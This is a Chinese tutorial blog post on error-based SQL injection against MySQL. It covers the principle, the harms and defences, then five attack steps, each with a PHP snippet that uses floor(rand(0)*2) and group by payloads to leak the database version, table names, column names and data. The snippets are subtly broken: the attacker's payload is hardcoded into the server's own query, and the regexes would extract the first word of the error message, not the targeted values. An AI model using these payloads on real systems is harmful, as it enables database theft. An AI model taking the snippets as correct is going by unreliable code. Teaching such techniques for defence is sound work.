报错盲注:原理、步骤与代码实例

最新推荐文章于 2026-01-19 13:20:18 发布
原创 最新推荐文章于 2026-01-19 13:20:18 发布 · 787 阅读 · 20 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#oracle #数据库

目录

报错盲注:原理、步骤与代码实例

一、报错盲注概述

(一)定义与原理

(二)危害

(三)防范措施

二、报错盲注攻击步骤与代码实例

(一)判断注入点

(二)获取数据库信息

(三)获取表名

(四)获取列名

(五)获取数据

在网络安全领域,SQL 注入攻击一直是一个重要的研究方向,而报错盲注作为其中一种特殊的攻击方式,具有独特的特点和利用方式。本文将详细介绍报错盲注是什么,包括其原理、危害以及防范措施,并通过具体的案例展示其攻击步骤和相应的代码实现。

一、报错盲注概述

(一)定义与原理

报错盲注是 SQL 注入攻击的一种类型,它利用数据库系统在执行 SQL 语句时产生的错误信息来获取数据库中的敏感信息。与普通的 SQL 注入不同,报错盲注不会直接在页面上显示查询结果,而是通过触发数据库的错误,使错误信息中包含我们想要获取的数据。其原理基于数据库对错误处理的机制,攻击者精心构造恶意的 SQL 语句,导致数据库执行出错,从而将敏感信息以错误信息的形式暴露出来。

(二)危害

报错盲注可能导致数据库中的敏感信息泄露,如用户账号、密码、个人隐私数据等。攻击者可以利用获取到的信息进行进一步的恶意行为,如非法登录、篡改数据、窃取用户资产等,严重威胁网站和用户的安全。

(三)防范措施

  1. 输入验证与过滤:对用户输入的数据进行严格的验证和过滤,确保其符合预期的格式和范围,避免包含恶意的 SQL 语句片段。
  2. 使用参数化查询:将用户输入作为参数传递给数据库查询,而不是直接嵌入到 SQL 语句中,这样可以防止 SQL 注入攻击。
  3. 最小权限原则:为数据库用户分配最小的必要权限,限制其对数据库的操作范围,即使发生注入攻击,也能降低损失。

二、报错盲注攻击步骤与代码实例

(一)判断注入点

  1. 原理:通过向目标 URL 或应用程序发送特殊构造的请求,观察其返回结果是否包含数据库错误信息,从而确定是否存在注入点。
  2. 示例代码(以 PHP 和 MySQL 为例)

<?php
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = '$id'";
$result = mysqli_query($conn, $query);
if (mysqli_error($conn)) {
    echo "可能存在注入点:". mysqli_error($conn);
}
?>

(二)获取数据库信息

  1. 原理:利用数据库系统的内置函数和特性,通过构造恶意的 SQL 语句,使数据库在执行时出错并返回包含数据库信息的错误消息。例如,使用 MySQL 的concat()函数和version()函数来获取数据库版本信息。
  2. 示例代码

<?php
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = '$id' or 1=1 and (select 1 from (select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)";
$result = mysqli_query($conn, $query);
if (mysqli_error($conn)) {
    $error = mysqli_error($conn);
    // 从错误信息中提取数据库版本
    preg_match('/\d+\.\d+\.\d+/', $error, $matches);
    if (isset($matches[0])) {
        echo "数据库版本:". $matches[0];
    }
}
?>

(三)获取表名

  1. 原理:通过查询数据库的系统表(如 MySQL 的information_schema.tables),结合报错信息来获取数据库中的表名。通常使用group byrand()函数来构造使数据库报错的条件。
  2. 示例代码

<?php
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = '$id' or 1=1 and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = 'your_database_name' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
$result = mysqli_query($conn, $query);
if (mysqli_error($conn)) {
    $error = mysqli_error($conn);
    // 从错误信息中提取表名
    preg_match('/\w+/', $error, $matches);
    if (isset($matches[0])) {
        echo "表名:". $matches[0];
    }
}
?>

(四)获取列名

  1. 原理:类似获取表名的方法,通过查询数据库系统表(如information_schema.columns),并利用报错信息来获取指定表中的列名。
  2. 示例代码

<?php
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = '$id' or 1=1 and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema = 'your_database_name' and table_name = 'your_table_name' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
$result = mysqli_query($conn, $query);
if (mysqli_error($conn)) {
    $error = mysqli_error($conn);
    // 从错误信息中提取列名
    preg_match('/\w+/', $error, $matches);
    if (isset($matches[0])) {
        echo "列名:". $matches[0];
    }
}
?>

(五)获取数据

  1. 原理:在确定了表名和列名后,通过构造 SQL 语句,利用报错信息获取表中具体的数据记录。
  2. 示例代码

<?php
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = '$id' or 1=1 and (select 1 from (select count(*),concat((select your_column_name from your_table_name limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
$result = mysqli_query($conn, $query);
if (mysqli_error($conn)) {
    $error = mysqli_error($conn);
    // 从错误信息中提取数据
    preg_match('/\w+/', $error, $matches);
    if (isset($matches[0])) {
        echo "数据:". $matches[0];
    }
}
?>

请注意,以上代码仅为示例,实际应用中需要根据目标系统和数据库的具体情况进行调整。同时,进行任何形式的安全测试都应该在合法授权的范围内进行,以避免违反法律法规和道德规范。

报错盲注是一种具有潜在威胁的攻击方式,了解其原理、攻击步骤和防范措施对于网络安全从业者和网站开发者至关重要。通过加强安全意识,采取有效的防范措施,可以有效降低报错盲注攻击带来的风险,保护网站和用户的信息安全。

SQL入之报错详解
DM766924的博客
09-15 2009
报错显示的原理: 前提:MYSQL报错信息必须能够在页面回显。原理:通过MYSQL一些函数的限制条件让其报错,产生超出预期的结果,且报错信息中包含重要信息。要求:需要能够知道MYSQL中哪些函数有限制条件,利用限制条件进行报错,需要了解函数原理才知道熟悉运用。分类: 基于group by报错入 基于xpath函数报错入(5.1.1及以上,extractvalue和updatexml) 基于double数值类型超出范围报错入(5.5.5及以上) 基于bignt溢出报错入 基于数据重复性报错入 报
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL,包括脚本)
weixin_45116657的博客
08-25 6525
目录: 一、SQL SQLSQL入的区别; SQL的过程; 二、实验环境 三、实验过程 基于布尔值的; 基于时间的; 一、SQL简介 1、SQL:SQL Injection(Blind),即SQL,目标只会回复是或不是,没有详细内容; 入:可以查看详细的内容 2、手工思路: 手工的过程,就像你和机器人聊天一样,这个机器人知道的...
SQL原理-报错
你们de4月天的博客
09-14 1206
SQL入-报错(updatexml()函数extractvalue()函数)
SQL入之报错(墨者学院)
waxcj的博客
05-02 3430
首先我们先来了解一下报错入的基本概念 1:报错入定义 报错入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 2:报错入前提 页面上没有回显点,但是必须有SQL语句执行错误的信息。 3:报错入优缺点 优点:不需要显示位,如果有显示位建议使用union联合查询。 缺点:需要有SQL语句的报错信息。 4:构造报错入的基本步骤 构造目标查询语句 选择报错入函数 构造报错入语句 拼接报错入语句 5:常见的报错入函数 updatexml(
sql报错入:extractvalue、updatexml报错原理
weixin_33881140的博客
03-07 589
报错入:extractvalue、updatexml报错原理 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的两个函数:extractvalue、updatexml 名称 描述 ExtractValue() 使用XPath表示法从XML字符串中提取值 UpdateXML() 返回替换的XML片段 通过这两个函数可以完成...
SQL入(head、报错
m0_74249600的博客
08-12 2364
本文讲述了head入、报错入以及时间布尔等sql入的基本入类型,之后我会继续出sql入知识点总结直至完整,请关持续更新(本文内容来自课件,如有版权问题请我联系)
SQL(原理概述、分类)
热门推荐
小赵同学的博客
12-29 2万+
原理 的分类 常用函数 的利用方法 一、SQL概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的来获取信息。 2.是不能通过直接显示的途径来获取数据库数据的方法。 可以分为三类: 布尔 时间 报错 1、布尔 查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
基于时间的原理简介
m0_38103658的博客
08-30 6650
基于时间的 简介 就是在sql入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为原理 的本质就是猜解,在没有回显数据的情况下,我们只能靠‘感觉’来体会每次查询时一点点细微的差异,而这差异包括运行时间的差异和页面返回结果的差异。 对于基于布尔的来说,我们可以构造一条入语句来测试我们输入的布尔表...
SQL 入流程速记:从联合入到
2502_91846894的博客
07-26 2286
本文详解三种主流SQL入攻击手法:联合入通过UNION操作符合并查询,逐步获取数据库信息;报错入利用数据库错误机制返回敏感数据;则通过页面状态或响应时间推测数据。不同手法各具特点:联合入直观高效但需回显,报错入依赖错误信息,适用于无回显场景。防范SQL入需综合运用参数过滤、预编译等技术,从源头阻断攻击可能。文章深入剖析各类原理操作流程,对提升网络安全防护意识具有重要参考价值。
SQLi LABS Less 14 报错入+布尔
wangyuxiang946的博客
06-21 1万+
SQLi 第十四关,SQLi-LABS Less-14,SQLi-LABS Less 14,SQLiLABS Less14,SQLi Less 14
SQL入4之报错
weixin_56218159的博客
05-27 490
SQL入之报错详解 报错显示的原理 前提:MYSQL报错信息必须能够在页面回显 原理:通过MYSQL一些函数的限制条件让其报错,产生超出预期的结果,且报错信息中包含重要信息 要求:需要能够知道MYSQL中哪些函数有限制条件,利用限制条件进行报错,需要了解函数原理才知道熟悉运用 分类 》基于group by报错入 》基于xpath函数报错入(5.1.1及以上,extractvalue和updatexml) 》基于double数值类型超出范围报错入(5.5.5及以上) 》基于bignt溢出
mysql_二十八、MySQL
weixin_39990401的博客
01-18 407
在学习本实验之前,请确保已经学过“SQL原理实践”这个实验。在 SQL原理实践 这个实验中,我们已经知道了SQL入的原理,并且能够完成支持union 且有回显的入,这种情况是最简单的,最容易入的,那么,如果入点发生在update、insert等这些不会有返回内容而仅仅只返回true或者false的 SQL语句中,或者仅仅select而没有输出查询的内容时,是不是就不能获取数据了...
SQL Injection | SQL 入 —— 报错
Blue17 の 小窝
10-21 2664
John 替换为 Blue17
安全中级11:sql入+联合、报错、时间+sqlmap使用
weixin_62870380的博客
07-02 5261
sql入的原理和流程,以及联合入、报错入、时间、布尔以及sqlmap使用。
SQL报错教程(原理全剖析)
Pz_mstr's Blog
08-21 1万+
深入分析基于报错的sql原理,解密“公式”的奥秘
sql入之三大原理及操作
qq_45908842的博客
08-13 1091
sql三大类:报错,布尔,时间
sql入之查询方法和报错 (16)
san3144393495的博客
04-24 899
当我们进行入的时候,有很多入会出现无回显得情况,就在入的时候没有报错信息和一些东西给予提示的,这种情况是无回显,在前期的入就没办法执行,我们需要他报出相关的数字,便于我们查询一些参数,如果出现无回显的情况就没变过进行了。出现这个无回显的原因,可能是sql查询方式有问题所导致的, 第二个原因是对方在sql语句执行之后这个结果显示它有一些显示上面的代码,他这个显示代码写的不当,不好,或者直接没写,也会导致这种无回显。一般结合表名和列名进行数据排序操作。会员或后台数据同步或缓存操作。
SQLi LABS Less 25 联合入+报错入+布尔
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
SQL:布尔、时间报错
最新发布
Alfadi联盟 萧瑶的博客
01-19 925
SQL 是一种攻击技术,攻击者在无法直接获得数据库查询结果(无数据回显、无详细报错)的情况下,通过向应用程序发送一系列精心构造的、包含SQL代码的输入,并观察应用程序的间接响应(如页面内容的变化、HTTP状态码的差异、响应时间的延长或特定的错误信息),从而像“人”一样,通过逻辑推理逐步提取出目标数据库中的信息(如数据库名、表名、字段名及具体数据)。),这是自动化工具的典型特征。· [SQL入基础联合查询入]:理解SQL入的根本原因、UNION查询的利用方式,是学习的前提。
SQL手工 - 报错回显
精神病院逃出来的疯子写的博客
09-28 356
就是在入的过程中,获取的数据不能显示到前端页面,此时,我们需要利用一些方法进行判断或者尝试,我们称之为报错回显就是其中的一种。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值